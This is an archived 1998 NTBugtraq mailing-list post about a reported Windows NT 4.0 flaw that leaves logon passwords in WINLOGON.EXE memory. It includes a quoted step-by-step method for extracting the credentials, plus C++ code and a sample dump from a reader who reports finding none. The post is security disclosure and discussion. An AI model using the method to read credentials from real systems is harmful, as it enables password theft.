OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
FW: Win NT 4.0 UserId and Password available in memory
[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

FW: Win NT 4.0 UserId and Password available in memory


  • To: NTBUGTRAQLISTSERV.NTBUGTRAQ.COM
  • Subject: FW: Win NT 4.0 UserId and Password available in memory
  • From: Raphael Barber <RaphaelBFCCTI.CO.UK>
  • Date: Fri, 4 Dec 1998 15:19:41 -0000
  • Approved-By: Russ.CooperRC.ON.CA
  • Reply-To: Raphael Barber <RaphaelBFCCTI.CO.UK>
  • Sender: Windows NT BugTraq Mailing List <NTBUGTRAQLISTSERV.NTBUGTRAQ.COM>

Oooops.
Meant to post to the list...

> -----Original Message-----
> From: Raphael Barber
> Sent: Thursday, December 03, 1998 1:43 PM
> To:   'russell.osterlundZURICH.COM'
> Subject:      RE: Win NT 4.0 UserId and Password available in memory
>
>       I've tried this but couldn't find anything that looks like what you
> describe...
>       this is what I got :
>
>       Dumping Memory for Process ID 34, 4096 bytes starting at address
> 0x10000 (4096 requested)
>
>       0x00000000  C.O.M.P.U.T.E.R.N.A.M.E.=.R.A.P.
>       0x00000020  H.A.E.L...C.o.m.S.p.e.c.=.C.:.\.
>       0x00000040  W.I.N.N.T.\.s.y.s.t.e.m.3.2.\.c.
>       0x00000060  m.d...e.x.e...L.O.G.O.N.S.E.R.V.
>       0x00000080  E.R.=.\.\.R.A.P.H.A.E.L...N.U.M.
>       0x000000A0  B.E.R._.O.F._.P.R.O.C.E.S.S.O.R.
>       0x000000C0  S.=.1...O.S.=.W.i.n.d.o.w.s._.N.
>       0x000000E0  T...O.s.2.L.i.b.P.a.t.h.=.C.:.\.
>       0x00000100  W.I.N.N.T.\.s.y.s.t.e.m.3.2.\.o.
>       0x00000120  s.2.\.d.l.l.;...P.a.t.h.=.C.:.\.
>       0x00000140  W.I.N.N.T.\.s.y.s.t.e.m.3.2.;.C.
>       0x00000160  :.\.W.I.N.N.T...P.R.O.C.E.S.S.O.
>       0x00000180  R._.A.R.C.H.I.T.E.C.T.U.R.E.=.x.
>       0x000001A0  8.6...P.R.O.C.E.S.S.O.R._.I.D.E.
>       0x000001C0  N.T.I.F.I.E.R.=.x.8.6...F.a.m.i.
>       0x000001E0  l.y...5...M.o.d.e.l...4...S.t.e.
>       0x00000200  p.p.i.n.g...4.,...G.e.n.u.i.n.e.
>       0x00000220  I.n.t.e.l...P.R.O.C.E.S.S.O.R._.
>       0x00000240  L.E.V.E.L.=.5...P.R.O.C.E.S.S.O.
>       0x00000260  R._.R.E.V.I.S.I.O.N.=.0.4.0.4...
>       0x00000280  S.y.s.t.e.m.D.r.i.v.e.=.C.:...S.
>       0x000002A0  y.s.t.e.m.R.o.o.t.=.C.:.\.W.I.N.
>       0x000002C0  N.T...U.S.E.R.P.R.O.F.I.L.E.=.C.
>       0x000002E0  :.\.W.I.N.N.T.\.P.r.o.f.i.l.e.s.
>       0x00000300  \.r.a.p.h.a.e.l...w.i.n.d.i.r.=.
>       0x00000320  C.:.\.W.I.N.N.T.....N.N.T.......
>       0x00000340  ................................
>       0x00000360  ................................
>       0x00000380  ................................
>       0x000003A0  ................................
>
>       using the following code (FTWCR)
>
>               HANDLE
> hProcess=OpenProcess(PROCESS_QUERY_INFORMATION|PROCESS_VM_READ,TRUE,id);
>               if(hProcess)
>               {
>                       void* lpBaseAddress=(void*)     base;
>                       BYTE* lpBuffer=new BYTE[size];
>                       DWORD dwNumberOfBytesRead=0;
>                       if(ReadProcessMemory(hProcess, (void*)lpBaseAddress,
> lpBuffer, size, &dwNumberOfBytesRead))
>                       {
>                               printf("Dumping Memory for Process ID %d, %d
> bytes starting at address 0x%X (%d
> requested)\n",id,dwNumberOfBytesRead,base,size);
>                               for(int n=0;n<dwNumberOfBytesRead;n++)
>                               {
>                                       if(n%32==0)     printf("\n0x%08X
> ",n);
>
> printf("%c",isgraph(lpBuffer[n])?lpBuffer[n]=='\0'?'_':lpBuffer[n]:'.');
>                               }
>                               printf("\n");
>                       }
>                       else
>                               printf("Error %d.\n",GetLastError());
>                       delete [] lpBuffer;
>               }
>
>       there's no more readable text in the rest of the page, and I
> couldn't read beyond that....
>
>       This was a very quick check, so I'm sure I've overlooked
> something.... could you give more details of your test?
>
>       Raphael
>
>
>       Russ wrote:
>
>       I have "stumbled upon" something peculiar concerning Windows NT 4.0
>       Workstation security.  It seems that the userid and password
>       remain in memory after a user has successfully logged on.
> Specifically,
>       the  memory space associated with WINLOGON.EXE memory
>        (the memory block containing the environment space) contains the
> values
>       "lMprNotifyUserName=xxxx" and "lMprNotifyPassword=yyyy",
>       where "xxxx" is the userid used to issue the logon to the
> workstation and
>       "yyyy" is the password.
>
>       Is this widely known?  It seems that basic security on a workstation
> has
>       been compromised by this behavior.
>
>       The algorithm used to discover the password and userid is the
> following:
>
>       1) Locate and determine WINLOGON's process id.
>       2) Open up this process for PROCESS_QUERY_INFORMATION and
> PROCESS_VM_READ
>       access.
>       3) Issue a ReadProcessMemory on the address 0x00010000 for one page.
>       4) Scan the copied memory area for the strings "lMprNotifyPassword="
> and
>       "lMprNotifyUserName" and display what comes after.
>
>       Thank you in advance for your interest.
>
>       Russ Osterlund
>
>